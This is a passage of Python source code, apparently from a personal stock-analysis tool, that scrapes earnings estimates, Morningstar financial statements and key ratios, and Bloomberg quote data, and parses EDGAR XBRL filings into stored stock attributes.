growth_estimate_reference_position = 0
headings = ["Earnings Est", "Revenue Est", "EPS Trends", "EPS Revisions", "Earnings History","Growth Est"]
subheadings = [
"Avg. Estimate",
"No. of Analysts",
"Low Estimate",
"High Estimate",
"Year Ago EPS",
"Avg. Estimate",
"No. of Analysts",
"Low Estimate",
"High Estimate",
"Year Ago Sales",
"Sales Growth (year/est)",
"Sales Growth (year over est)", # needed for edited subheading
"EPS Est",
"EPS Actual",
"Difference",
"Surprise %",
"Current Estimate",
"7 Days Ago",
"30 Days Ago",
"60 Days Ago",
"90 Days Ago",
"Up Last 7 Days",
"Up Last 30 Days",
"Down Last 30 Days",
"Down Last 90 Days",
"Current Qtr.",
"Next Qtr.",
"This Year",
"Next Year",
"Past 5 Years (per annum)",
"Next 5 Years (per annum)",
"Price/Earnings (avg. for comparison categories)",
"PEG Ratio (avg. for comparison categories)",
]
next_position_is_heading = False
next_position_is_subheading = False
data_countdown = 0
count = 0 # 0th will always be skipped
for i in data_list:
do_print = True
if str(i) in headings and next_position_is_heading == False:
next_position_is_heading = True
elif str(i) in headings and next_position_is_heading == True:
heading = i
next_position_is_subheading = True
next_position_is_heading = False
elif next_position_is_subheading == True:
subheading = i
data_countdown = 4
next_position_is_subheading = False
elif data_countdown > 0:
if str(subheading) not in subheadings:
logging.info("%d > %s > %s" % (count, subheading, i))
subheading = None
next_position_is_subheading = True
continue
if heading in ["Earnings Est", "Revenue Est", "EPS Trends", "EPS Revisions"]:
if subheading == "Sales Growth (year/est)":
subheading = "Sales Growth (year over est)"
stock_attribute_name = str(heading) + "_" + str(subheading) + "_" + str(date_period_list[date_period_list_position % 4])
date_period_list_position += 1
elif heading in ["Earnings History"]:
if count not in earnings_history_date_locations:
stock_attribute_name = str(heading) + "_" + str(subheading) + "_" + str(earnings_history_dates[earnings_history_date_position % 4])
earnings_history_date_position += 1
elif heading in ["Growth Est"]:
if count not in growth_estimate_reference_locations:
stock_attribute_name = str(heading) + "_" + str(subheading) + "_" + str(growth_estimate_references[growth_estimate_reference_position % 4])
growth_estimate_reference_position += 1
stock_attribute_name = stock_attribute_name.replace(" ","_")
stock_attribute_name = stock_attribute_name.replace("/","_")
stock_attribute_name = stock_attribute_name.replace(".","")
stock_attribute_name = stock_attribute_name.replace("'","")
stock_attribute_name = stock_attribute_name.replace("%","Pct")
stock_attribute_name = stock_attribute_name.replace("(","")
stock_attribute_name = stock_attribute_name.replace(")","")
db.set_Stock_attribute(stock, stock_attribute_name, i, "_yf")
logging.info("%d > %s.%s = %s" % (count, stock.symbol, stock_attribute_name, i))
do_print = False
data_countdown -= 1
if data_countdown == 0 and next_position_is_subheading != True:
subheading = None
next_position_is_subheading = True
if do_print == True:
logging.info("{} {} {}".format(count, "|", i))
count += 1
skip_position = False
db.save_GLOBAL_STOCK_DICT()
################################################################################################
##################### Morningstar Scrapers "_ms" ###############################################
# Morningstar Annual Data Scrapers
def ms_annual_cash_flow_scrape(ticker):
logging.info("Starting: ms_annual_cash_flow_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.error("Error: stock %s does not exist" % ticker)
most_recent_update = stock.last_cash_flow_update_ms
last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
if most_recent_update > last_acceptable_update:
logging.info("MS Cash flow data for %s is up to date." % ticker)
return
if stock:
exchange = getattr(stock, config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE)
if exchange == 'NYSE':
exchange_code = "XNYS"
elif exchange in ["NasdaqNM", "NASDAQ"]:
exchange_code = "XNAS"
else:
logging.info("Unknown Exchange Code for {}".format(stock.symbol))
return
else:
logging.warning('Stock cannot be updated, need exchange symbol')
return
morningstar_raw = urlopen('http://financials.morningstar.com/ajax/ReportProcess4HtmlAjax.html?&t=%s:%s®ion=usa&culture=en-US&cur=USD&reportType=cf&period=12&dataType=A&order=asc&columnYear=5&rounding=3&view=raw&r=963470&callback=jsonp%d&_=%d' % (exchange_code, ticker, int(time.time()), int(time.time()+150)))
morningstar_json = morningstar_raw.read()
morningstar_string = str(morningstar_json)
# dummy_str = ""
# start_copy = False
# for char in morningstar_string:
# if start_copy == False and char != "(":
# continue
# elif start_copy == False and char == "(":
# start_copy = True
# continue
# elif start_copy == True:
# dummy_str += char
# morningstar_string = dummy_str[:-1]
# try:
# morningstar_json = json.loads(morningstar_string)
# except Exception as exception:
# print exception
# print morningstar_string
# print morningstar_raw.read()
# return
# #print morningstar_json["ADR"], "<-- should say false"
# morningstar_html = morningstar_json["result"]
dummy_str = ""
start_copy = False
last_char_was_backslash = False
for char in morningstar_string:
if char == "<" and not start_copy:
start_copy = True
dummy_str += char
elif start_copy:
if char == "\\":
last_char_was_backslash = True
elif last_char_was_backslash == True:
if char in ["t","r","n"]:
last_char_was_backslash = False
elif char in ['"', "'", "/"]:
dummy_str += char
last_char_was_backslash = False
else:
logging.info("\\%s" % char)
last_char_was_backslash = False
else:
dummy_str += char
morningstar_html = dummy_str
soup = BeautifulSoup(morningstar_html, "html.parser")
full_data = []
div_ids = ["tts", "s", "i"] # these are the three unique labels for divs on morningstar
for div_id in div_ids:
count = 0
for i in range(100): # this may need to be larger
label = soup.find("div", {"id":"label_%s%d" % (div_id, count)})
if label:
try:
label["style"]
if "display:none;" in str(label["style"]):
# I'm not comfortable accepting unshown data right now
count+=1
continue
except:
pass
name = label.find("div", {"class":"lbl"})
try:
title = name["title"]
name = title
except:
title = None
name = name.string
else:
name = None
count += 1
continue
#if name:
# logging.info(name.children())
data = soup.find("div", {"id":"data_%s%d" % (div_id, count)})
if data:
data_list = []
for i in reversed(range(6)):
i += 1 # id's are ordinal
data_list.append(data.find("div", {"id":"Y_%d" % i})["rawvalue"])
#if name and data_list:
# logging.info(name)
# for i in data_list:
# logging.info(i)
# logging.info("\n\n")
full_data.append([name,data_list])
count+=1
logging.info("total units of data = {}".format(len(full_data)))
#for i in full_data:
# logging.info(i[0])
# for j in i[1]:
# logging.info(j)
success = False
for datum in full_data:
attribute = datum[0]
attribute = attribute.replace(" ","_")
attribute = attribute.replace("-","_")
attribute = attribute.replace("/","_")
attribute = attribute.replace(",","_")
attribute = attribute.replace("'","")
attribute = attribute.replace("(Gain)_", "")
attribute = attribute.replace("(expense)_", "")
attribute = attribute.replace("(used_for)", "used_for")
attribute = attribute.replace("__","_")
data_list = datum[1]
trailing_x_year_list = ["", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y"]
for i in range(len(data_list)):
if data_list[i] == u'\u2014':
data_list[i] = "-"
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol, str(attribute + trailing_x_year_list[i]) + "_ms", int(data_list[i])))
success = True
except:
try:
logging.info(data_list[i])
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol, str(attribute + trailing_x_year_list[i]) + "_ms", str(data_list[i])))
success = True
except Exception as exception:
logging.error(exception)
if success:
db.save_GLOBAL_STOCK_DICT()
logging.info("\ncash flow done\n")
return success
def ms_annual_income_statement_scrape(ticker):
logging.info("Starting: ms_annual_income_statement_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.error("Error: stock %s does not exist" % ticker)
most_recent_update = stock.last_income_statement_update_ms
last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
if most_recent_update > last_acceptable_update:
logging.info("MS income statement data for %s is up to date." % ticker)
return
if stock:
exchange = getattr(stock, config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE)
if exchange == 'NYSE':
exchange_code = "XNYS"
elif exchange in ["NasdaqNM", "NASDAQ"]:
exchange_code = "XNAS"
else:
logging.info("Unknown Exchange Code for {}".format(stock.symbol))
return
else:
logging.warning('Stock cannot be updated, need exchange symbol')
return
morningstar_raw = urlopen('http://financials.morningstar.com/ajax/ReportProcess4HtmlAjax.html?&t=%s:%s®ion=usa&culture=en-US&cur=USD&reportType=is&period=12&dataType=A&order=asc&columnYear=5&rounding=3&view=raw&r=354589&callback=jsonp%d&_=%d' % (exchange_code, ticker, int(time.time()), int(time.time()+150)))
morningstar_json = morningstar_raw.read()
morningstar_string = str(morningstar_json)
# dummy_str = ""
# start_copy = False
# for char in morningstar_string:
# if start_copy == False and char != "(":
# continue
# elif start_copy == False and char == "(":
# start_copy = True
# continue
# elif start_copy == True:
# dummy_str += char
# morningstar_string = dummy_str[:-1]
# try:
# morningstar_json = json.loads(morningstar_string)
# except Exception as exception:
# print exception
# print morningstar_string
# print morningstar_raw.read()
# return
# #print morningstar_json["ADR"], "<-- should say false"
# morningstar_html = morningstar_json["result"]
dummy_str = ""
start_copy = False
last_char_was_backslash = False
for char in morningstar_string:
if char == "<" and not start_copy:
start_copy = True
dummy_str += char
elif start_copy:
if char == "\\":
last_char_was_backslash = True
elif last_char_was_backslash == True:
if char in ["t","r","n"]:
last_char_was_backslash = False
elif char in ['"', "'", "/"]:
dummy_str += char
last_char_was_backslash = False
else:
logging.info("\\%s" % char)
last_char_was_backslash = False
else:
dummy_str += char
morningstar_html = dummy_str
soup = BeautifulSoup(morningstar_html, "html.parser")
full_data = []
div_ids = ["tts", "s", "i", "g", "gg"] # these are the three unique labels for divs on morningstar
for div_id in div_ids:
count = 0
for i in range(100): # this may need to be larger
label = soup.find("div", {"id":"label_%s%d" % (div_id, count)})
if label:
try:
label["style"]
if "display:none;" in str(label["style"]):
# I'm not comfortable accepting unshown data right now
count+=1
continue
except:
pass
name = label.find("div", {"class":"lbl"})
try:
title = name["title"]
name = title
except:
title = None
name = name.string
if not name:
name = label.findAll(text=True)
#name = name.string
name = str(name)
dummy_str = ""
u_gone = False # there is a "u" that starts every fake unicode thing
for i in name:
if i not in ["'",'"',"[","]"]:
if i == "u" and u_gone == False:
u_gone = True
else:
dummy_str += i
name = dummy_str
if name in ["Basic", "Diluted"]: # here there is a quirk, where EPS is in the previous div, and so you need to grab it and add it onto the name
if name == "Basic":
try:
prefix = label.findPreviousSibling('div').find("div", {"class":"lbl"})["title"]
except:
prefix = label.findPreviousSibling('div').find("div", {"class":"lbl"}).string
elif name == "Diluted":
try:
prefix = label.findPreviousSibling('div').findPreviousSibling('div').find("div", {"class":"lbl"})["title"]
except:
prefix = label.findPreviousSibling('div').findPreviousSibling('div').find("div", {"class":"lbl"}).string
name = prefix + " " + name
else:
name = None
count += 1
continue
data = soup.find("div", {"id":"data_%s%d" % (div_id, count)})
if data:
data_list = []
for i in reversed(range(6)): # 6 data points on this page
i += 1 # id's are ordinal
found_data = data.find("div", {"id":"Y_%d" % i})["rawvalue"]
if found_data:
data_list.append(found_data)
else:
logging.info(data)
if name and data_list:
full_data.append([str(name),data_list])
else:
if not name:
logging.info("{} {} {} {}".format(label, "\n", name, "\n"))
elif not data_list:
logging.info(data)
count+=1
logging.info("total units of data = {}".format(len(full_data)))
success = False
for datum in full_data:
attribute = datum[0]
attribute = attribute.replace(" ","_")
attribute = attribute.replace("-","_")
attribute = attribute.replace("/","_")
attribute = attribute.replace(",","_")
attribute = attribute.replace("'","")
attribute = attribute.replace("(Gain)_", "")
attribute = attribute.replace("(expense)_", "")
attribute = attribute.replace("(used_for)", "used_for")
attribute = attribute.replace("__","_")
data_list = datum[1]
trailing_x_year_list = ["_ttm", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y"]
for i in range(len(data_list)):
if data_list[i] == u'\u2014':
data_list[i] = "-"
elif data_list[i] == "nbsp":
continue
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", int(data_list[i])))
success = True
except:
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", str(data_list[i])))
success = True
except Exception as exception:
logging.error(exception)
if success:
db.save_GLOBAL_STOCK_DICT()
logging.info("\nincome statement done\n")
return success
def ms_annual_balance_sheet_scrape(ticker):
logging.info("Starting: ms_annual_balance_sheet_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.info("Error: stock %s does not exist" % ticker)
most_recent_update = stock.last_balance_sheet_update_ms
last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
if most_recent_update > last_acceptable_update:
logging.info("MS balance sheet data for %s is up to date." % ticker)
return
if stock:
exchange = getattr(stock, config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE)
if exchange == 'NYSE':
exchange_code = "XNYS"
elif exchange in ["NasdaqNM", "NASDAQ"]:
exchange_code = "XNAS"
else:
logging.info("Unknown Exchange Code for {}".format(stock.symbol))
return
else:
logging.info('Stock cannot be updated, need exchange symbol')
return
url = 'http://financials.morningstar.com/ajax/ReportProcess4HtmlAjax.html?&t=%s:%s®ion=usa&culture=en-US&cur=USD&reportType=bs&period=12&dataType=A&order=asc&columnYear=5&rounding=3&view=raw'% (exchange_code, ticker)#&r=782238&callback=jsonp%d&_=%d' % (exchange_code, ticker, int(time.time()), int(time.time()+150))
#logging.info("\n{}\n".format(url))
morningstar_raw = urlopen(url)
logging.info("morningstar_raw: {}\n".format(morningstar_raw))
if not morningstar_raw:
logging.info("failed")
morningstar_json = morningstar_raw.read()
morningstar_string = str(morningstar_json)
#dummy_str = ""
#start_copy = False
#for char in morningstar_string:
# if start_copy == False and char != "(":
# continue
# elif start_copy == False and char == "(":
# start_copy = True
# continue
# elif start_copy == True:
# dummy_str += char
#morningstar_string = dummy_str[:-1]
dummy_str = ""
start_copy = False
last_char_was_backslash = False
for char in morningstar_string:
if char == "<" and not start_copy:
start_copy = True
dummy_str += char
elif start_copy:
if char == "\\":
last_char_was_backslash = True
elif last_char_was_backslash == True:
if char in ["t","r","n"]:
last_char_was_backslash = False
elif char in ['"', "'", "/"]:
dummy_str += char
last_char_was_backslash = False
else:
logging.info("\\%s" % char)
last_char_was_backslash = False
else:
dummy_str += char
morningstar_html = dummy_str
soup = BeautifulSoup(morningstar_html, "html.parser")
full_data = []
div_ids = ["tts", "s", "i", "g", "gg"] # these are the three unique labels for divs on morningstar
for div_id in div_ids:
count = 0
for i in range(100): # this may need to be larger
label = soup.find("div", {"id":"label_%s%d" % (div_id, count)})
if label:
try:
label["style"]
if "display:none;" in str(label["style"]):
# I'm not comfortable accepting unshown data right now
count+=1
continue
except:
pass
name = label.find("div", {"class":"lbl"})
try:
title = name["title"]
name = title
except:
title = None
name = name.string
if not name:
name = label.findAll(text=True)
#name = name.string
name = str(name)
dummy_str = ""
u_gone = False # there is a "u" that starts every fake unicode thing
for i in name:
if i not in ["'",'"',"[","]"]:
if i == "u" and u_gone == False:
u_gone = True
else:
dummy_str += i
name = dummy_str
else:
name = None
count += 1
continue
#if name:
data = soup.find("div", {"id":"data_%s%d" % (div_id, count)})
if data:
data_list = []
for i in reversed(range(5)):
i += 1 # id's are ordinal
found_data = data.find("div", {"id":"Y_%d" % i})["rawvalue"]
if found_data:
data_list.append(found_data)
else:
logging.info(data)
if name and data_list:
full_data.append([str(name),data_list])
else:
if not name:
logging.info("{} {} {} {}".format(label, "\n", name, "\n"))
elif not data_list:
logging.info(data)
count+=1
logging.info("total units of data = {}".format(len(full_data)))
success = False
for datum in full_data:
attribute = datum[0]
attribute = attribute.replace(" ","_")
attribute = attribute.replace("-","_")
attribute = attribute.replace("/","_")
attribute = attribute.replace(",","_")
attribute = attribute.replace("'","")
attribute = attribute.replace("(Gain)_", "")
attribute = attribute.replace("(expense)_", "")
attribute = attribute.replace("(used_for)", "used_for")
attribute = attribute.replace("__","_")
data_list = datum[1]
trailing_x_year_list = ["", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y"]
for i in range(len(data_list)):
if data_list[i] == u'\u2014':
data_list[i] = "-"
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", int(data_list[i])))
success = True
except:
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", str(data_list[i])))
success = True
except Exception as exception:
logging.error(exception)
if success:
db.save_GLOBAL_STOCK_DICT()
logging.info("\nbalance sheet done\n")
return success
# Morningstar Key Ratios (Not increadibly reliable for all data (rounding large numbers), consider alternatives if necessary)
def ms_key_ratios_scrape(ticker):
stock_exchange_var = config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE
logging.info("Starting: ms_key_ratios_scrape for %s" % ticker)
ticker = ticker.upper()
logging.info("morningstar_key_ratios_scrape: {}".format(ticker))
stock = utils.return_stock_by_symbol(ticker)
if not stock:
return
if stock:
yesterdays_epoch = float(time.time()) - (60 * 60 * 24)
#if stock.morningstar_key_ratios_scrape > yesterdays_epoch: # if data is more than a day old
# logging.info("Cash flow data for %s is up to date." % ticker)
# return
exchange = getattr(stock, stock_exchange_var)
logging.info(exchange)
if exchange == 'NYSE':
exchange_code = "XNYS"
elif exchange in ["NasdaqNM", "NASDAQ"]:
exchange_code = "XNAS"
else:
logging.info("Unknown Exchange Code for {}".format(stock.symbol))
return
### First get your scrape ###
logging.info('http://financials.morningstar.com/financials/getFinancePart.html?&callback=jsonp1408061143067&t=%s:%s®ion=usa&culture=en-US&cur=USD&order=asc&_=1408061143210' % (exchange_code, ticker))
morningstar_raw = urlopen('http://financials.morningstar.com/financials/getFinancePart.html?&callback=jsonp1408061143067&t=%s:%s®ion=usa&culture=en-US&cur=USD&order=asc&_=1408061143210' % (exchange_code, ticker))
#morningstar_raw = urlopen('http://financials.morningstar.com/ajax/exportKR2CSV.html?&callback=?&t=%s:%s®ion=usa&culture=en-US&cur=USD&order=' % (exchange_code, ticker) )#, int(time.time()), int(time.time()+150)))
morningstar_json = morningstar_raw.read()
#logging.info(morningstar_json)
morningstar_string = str(morningstar_json)
### Now, remove improper chars ###
dummy_str = ""
start_copy = False
last_char_was_backslash = False
for char in morningstar_string:
if char == "<" and not start_copy:
start_copy = True
dummy_str += char
elif start_copy:
if char == "\\":
last_char_was_backslash = True
elif last_char_was_backslash == True:
if char in ["t","r","n"]:
last_char_was_backslash = False
elif char in ['"', "'", "/"]:
dummy_str += char
last_char_was_backslash = False
else:
#logging.info("\\%s" % char)
last_char_was_backslash = False
else:
dummy_str += char
#logging.info(dummy_str)
morningstar_html = dummy_str
#logging.info(morningstar_html)
### convert to soup ###
soup = BeautifulSoup(morningstar_html, "html.parser")
full_data = []
### parse the soup ###
# Here we set the dates
# Y10 = ttm
# Y9 = t1y
# Y8 = t2y
# etc.
data_list = []
div_id = "i" # these are the three unique labels for divs on morningstar
count = 0
for i in range(100): # this may need to be larger
label = soup.find("th", {"id":"%s%d" % (div_id, count)})
if label:
# first find the row names and units
try:
label["style"]
if "display:none;" in str(label["style"]):
# I'm not comfortable accepting unshown data right now
count+=1
continue
except:
pass
name = label.contents[0]
if len(label) > 1:
units = label.contents[1]
units = units.contents[0]
#logging.info((name, units))
label_data = []
data_sublist = [str(name), str(units), label_data]
# Now gather the data using the row id and year in the "header" section
# "Y0" or year 0, appears to be 10 years ago,
# where as Y10 appears to be the trailing 12 months data
# it's a bit of some odd data, but it's obviously manageable.
for years_ago in reversed(range(11)): # this may also be larger
data = soup.find("td", {"headers": "Y%d i%d" % (years_ago, count)})
if data:
#logging.info(data.contents)
for datum in data.contents:
label_data.append(str(datum))
#logging.info(data_sublist)
data_list.append(data_sublist)
else:
name = None
count += 1
continue
#if name:
# logging.info(name.children())
data = soup.find("div", {"id":"data_%s%d" % (div_id, count)})
if data:
data_list = []
for i in reversed(range(6)):
i += 1 # id's are ordinal
data_list.append(data.find("div", {"id":"Y_%d" % i})["rawvalue"])
full_data.append([name,data_list])
count+=1
logging.info(("total units of data =", len(data_list)))
success = False
### convert to data_lists ###
#########
data_list = morningstar_recursive_data_list_string_edit(data_list)
data_list = morningstar_add_zeros_to_usd_millions(data_list)
#########
#logging.info("data_list print follows:")
#pp.pprint(data_list)
### save data to object ###
# datum is [name, units, [datalist]]
count = 1
for datum in data_list:
attribute = datum[0]
count += 1
data_list = datum[2]
trailing_x_year_list = ["_ttm", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y", "_t6y", "_t7y", "_t8y", "_t9y", "_t10y"]
for i in range(len(data_list)):
if data_list[i] == u'\u2014':
data_list[i] = "-"
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
#logging.info((stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", int(data_list[i])))
except:
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
#logging.info((stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", str(data_list[i])))
except Exception as exception:
logging.error(exception)
# testing only
success = False
#
### save object ###
stock.last_morningstar_key_ratios_update = float(time.time())
db.save_GLOBAL_STOCK_DICT()
logging.info(("\n", "key ratios done", "\n"))
return success
def morningstar_recursive_data_list_string_edit(data_list, recursion_count = 0):
dummy_list = []
for datum in data_list:
if type(datum) is list:
recursion_count += 1
if recursion_count > 10:
logging.info("max recusions achieved")
return
#logging.info("Recursion (%d) for: morningstar_recursive_data_list_string_edit" % recursion_count)
datum = morningstar_recursive_data_list_string_edit(datum, recursion_count = recursion_count)
#logging.info("End recursion level %d" % recursion_count)
recursion_count -= 1
elif type(datum) is (str or unicode):
try:
datum = datum.replace(",", "")
if not datum.isdigit():
raise Exception("Not a number")
datum = datum.replace("\xe2\x80\x94","-")
#logging.info(("string (number) saved:", datum))
except:
datum = datum.replace("%", "perc")
datum = datum.replace(" ","_")
#datum = datum.replace("-","_")
datum = datum.replace("/","_")
datum = datum.replace(",","_")
datum = datum.replace("'","")
datum = datum.replace("(Gain)_", "")
datum = datum.replace("(expense)_", "")
datum = datum.replace("(used_for)", "used_for")
datum = datum.replace("__","_")
datum = datum.replace("\xc2\xa0", "")
datum = datum.replace("\xe2\x80\x94","-")
# datum = datum.replace(u"%", u"perc")
# datum = datum.replace(u" ",u"_")
# datum = datum.replace(u"-",u"_")
# datum = datum.replace(u"/",u"_")
# datum = datum.replace(u",",u"_")
# datum = datum.replace(u"'",u"")
# datum = datum.replace(u"(Gain)_", u"")
# datum = datum.replace(u"(expense)_", u"")
# datum = datum.replace(u"(used_for)", u"used_for")
# datum = datum.replace(u"__",u"_")
#logging.info(("string saved:", datum))
else:
#logging.info(("Not able to parse:", datum))
pass
dummy_list.append(datum)
data_list = dummy_list
return data_list
def morningstar_add_zeros_to_usd_millions(data_list):
dummy_list = []
for datum in data_list:
#logging.info("edits:")
#logging.info(datum[1])
if not len(datum) == 3:
logging.error("morningstar_add_zeros_to_usd_millions error, not correctly formated list")
if datum[1] in ["USD Mil", u"USD Mil", "USD_Mil", u"USD_Mil"]:
dummy_list_2 = []
for amount_of_dollars in datum[2]:
#logging.info(amount_of_dollars)
if str(amount_of_dollars).isdigit():
#logging.info("converting %s to %s000" % (amount_of_dollars, amount_of_dollars))
amount_of_dollars = amount_of_dollars + "000"
dummy_list_2.append(amount_of_dollars)
datum[2] = dummy_list_2
datum[1] = "USD_from_Mil"
dummy_list.append(datum)
elif datum[1] in ["Mil", u"Mil"]:
dummy_list_2 = []
for amount in datum[2]:
if amount.isdigit():
amount = amount + "000"
dummy_list_2.append(amount)
datum[2] = dummy_list_2
datum[1] = "was_Mil"
dummy_list.append(datum)
else:
dummy_list.append(datum)
data_list = dummy_list
return data_list
################################################################################################
###################### Bloomberg Scrapers "_bb" ################################################
def bloomberg_us_stock_quote_scrape(ticker):
url = "https://www.bloomberg.com/quote/{ticker}:US".format(ticker=ticker)
response = requests.get(url, headers=config.HEADERS)
page = response.text
#logging.warning(page)
soup = BeautifulSoup(page, "html.parser")
data_units = soup.find_all("script")
output_list = []
for unit in data_units:
if "window.__bloomberg__" in unit.text:
unit_text = str(unit)
str_list = unit_text.split("window.__bloomberg__")
for str_unit in str_list:
dict_str = str_unit.split(" = ", 1)[-1]
value = dict_str.strip()
if value.endswith("</script>"):
value = value.rsplit("</script>", 1)[0]
value = value.strip()
if not value:
continue
#print(value[-1])
if value.endswith(";"):
value = value[:-1]
#print("\t", value[-1])
if value and value.startswith("{") and value.endswith("}"):
value = json.loads(value)
output_list.append(value)
else:
#logging.warning(value)
continue
data = replace_bloomberg_values_list(output_list)
logging.warning("")
pp.pprint(data)
if len(data) == 1:
data = data[0]
else:
logging.warning('len = {}'.format(len(data)))
bloomberg_dict = data
convert_bloomberg_dict_to_stock_object_data(ticker, bloomberg_dict)
# pp.pprint(data)
# with open('output{}.txt'.format(ticker), 'wt') as out:
# pp.pprint(data, stream=out)
def replace_bloomberg_values_dict(input_dict, original_list):
bloomberg_dict = {}
for key, value in input_dict.items():
if key in ["adCode", "api", "balance", "cash", "income", "dataStrip", "news", "sectors", "time"]:
continue
new_value = None
if type(value) is dict:
new_value = replace_bloomberg_values_dict(value, original_list)
elif type(value) is list:
new_value = replace_bloomberg_values_list(value, original_list)
elif type(value) in [str, int, float, bool]:
if type(value) is str:
if value.startswith("$"):
new_value = replace_bloomberg_dollarsign_keys_with_values(value, original_list)
elif value:
logging.warning(type(value))
if new_value:
bloomberg_dict[key] = new_value
elif value and (value != "None"):
if not key.startswith("$"):
bloomberg_dict[key] = value
if bloomberg_dict:
return bloomberg_dict
def replace_bloomberg_values_list(input_list, original_list=None):
if original_list is None:
original_list = input_list
new_list = []
for item in input_list:
if type(item) is dict:
new_value = replace_bloomberg_values_dict(item, original_list)
if new_value:
new_list.append(new_value)
elif type(item) is list:
new_value = replace_bloomberg_values_list(item, original_list)
if new_value:
new_list.append(new_value)
elif type(item) in [str, int, float, bool]:
if item and (item != "None"):
new_list.append(item)
elif item:
logging.warning(type(item))
return new_list
def replace_bloomberg_dollarsign_keys_with_values(ref_str, original_list):
for ref_dict in original_list:
ref_list = [x for x in ref_dict.keys() if x.startswith("$")]
if ref_list:
if ref_str in ref_list:
return ref_dict[ref_str]
def convert_bloomberg_dict_to_stock_object_data(ticker, bloomberg_dict):
stock = utils.return_stock_by_symbol(ticker)
# key stats
key_stats = bloomberg_dict.get("keyStats")
key_stats_list = None
if key_stats:
key_stats_list = key_stats.get("keyStatsList")
if key_stats_list:
for stat_dict in key_stats_list:
stat_id = stat_dict.get("id")
stat_value = stat_dict.get("fieldValue")
if stat_id:
db.set_Stock_attribute(stock, str(stat_id), stat_value, "_bb")
# quote
quote = bloomberg_dict.get("quote")
if quote:
if type(quote) is dict:
for key, value in quote.items():
if type(value) in [list, dict, set]:
# lots of unhelpful large amounts of data
continue
db.set_Stock_attribute(stock, str(key), value, "_bb")
################################################################################################
###EDGAR Scrapers: 10-k:"_tk","10-Q":"_tq","8-K":"_ek","20-F":"_tf","13-D":"_td","144":"_of" ###
def return_xbrl_tree_and_namespace(path_to_zipfile=None):
ticker = None
# logging.info(zipfile)
try:
archive = zf.ZipFile(path_to_zipfile, 'r')
except Exception as e:
logging.error(e)
return[None, None, None]
name_list = archive.namelist()
main_file_name = None
for name in name_list:
if name.endswith(".xml") and "_" not in name:
# logging.info(name)
main_file_name = name
# logging.warning(main_file_name)
ns = {}
try:
for event, (name, value) in ET.iterparse(archive.open(main_file_name), ['start-ns']):
if name:
ns[name] = value
except Exception as e:
logging.error(e)
return[None, None, None]
tree = ET.parse(archive.open(main_file_name))
return [tree, ns, main_file_name]
def return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution, xbrl_dict=None, period=None):
if institution not in ["us-gaap", "dei"]:
if institution.lower() == ticker.lower():
institution = "corp"
else:
logging.info(institution)
if institution == "us-gaap":
institution = "gaap"
if period:
if period == "period":
attribute_str = str(accounting_item) + "_" + str(institution)
else:
attribute_str = str(accounting_item) + "_" + str(institution) + "_most_recent_" + period
elif xbrl_dict:
attribute_str = str(accounting_item) + "_" + str(institution) + "__dict"
else:
attribute_str = str(accounting_item) + "_" + str(institution)
attribute_str = attribute_str.replace("-", "_")
return attribute_str
def return_document_type_suffix(base_dict):
document_type = None
try:
document_type_dict = base_dict.get("dei").get("DocumentType")
document_type_dict_keys = list(document_type_dict.keys())
document_type = document_type_dict.get(document_type_dict_keys[0]).get("value")
logging.info(document_type)
except Exception as e:
logging.error(e)
if document_type in config.IGNORED_XBRL_DOCUMENT_TYPE_LIST:
return
amended_report = False
transitional_report = False
if document_type:
if "/A" in document_type:
amended_report = True
document_type = document_type.replace("/A", "")
if document_type[-1:] == "T":
transitional_report = True
document_type = document_type[:-1]
suffix = None
if document_type in config.DESIRED_XBRL_DOCUMENT_TYPE_LIST:
if document_type == "10-K":
suffix = "_tk"
elif document_type == "10-Q":
suffix = "_tq"
elif document_type == "8-K":
suffix = "_ek"
elif document_type == "20-F":
suffix = "_tf"
elif document_type == "13-D":
suffix = "_td"
elif document_type == "144":
suffix = "_of"
else:
raise Exception("No document_type '{}' in xbrl file".format(document_type))
else:
if document_type:
logging.error(document_type)
if document_type not in config.IGNORED_XBRL_DOCUMENT_TYPE_LIST:
config.UNLISTED_XBRL_DOCUMENT_TYPE_LIST.append(document_type)
logging.warning(config.UNLISTED_XBRL_DOCUMENT_TYPE_LIST)
return
if transitional_report:
suffix = "__t" + suffix
if amended_report:
